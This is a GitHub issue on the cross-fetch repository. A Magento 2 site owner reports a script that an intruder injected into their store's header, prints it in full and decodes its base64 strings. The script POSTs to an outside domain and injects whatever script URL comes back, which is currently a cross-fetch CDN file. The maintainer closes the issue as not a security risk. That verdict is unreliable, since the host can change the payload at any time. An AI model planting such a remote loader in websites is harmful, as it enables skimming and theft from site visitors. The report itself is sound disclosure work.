search

lquixada / cross-fetch

Universal WHATWG Fetch API for Node, Browsers and React Native.
MIT License
1.66k stars 102 forks source link

Magento 2 hacked and added this script which reaches this repo #159

Closed vy-shmal closed 1 year ago

vy-shmal commented 1 year ago

We have a Magento 2 that somehow a hacker added this script to the header.

<script>fetch(atob('aHR0cHM6Ly9vc29idGVjaC55YWNodHM'),{method: 'POST'}).then(r=> r.blob()).then(d=> d.text().then(b=>{const s=document.createElement('script'); s.src=atob(b); s.async=true; document.head.appendChild(s);}));</script>

aHR0cHM6Ly9vc29idGVjaC55YWNodHM = https://osobtech.yachts

the POST request returns

Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw = //unpkg.com/cross-fetch@3.1.5/dist/cross-fetch.js

As I decoded it, it guided me to cross-fetch repo.

I added it here so you would be aware of the issue.

lquixada commented 1 year ago

@vy-shmal Thanks for reporting. The script doesn't seem to be a security risk. Will close for now.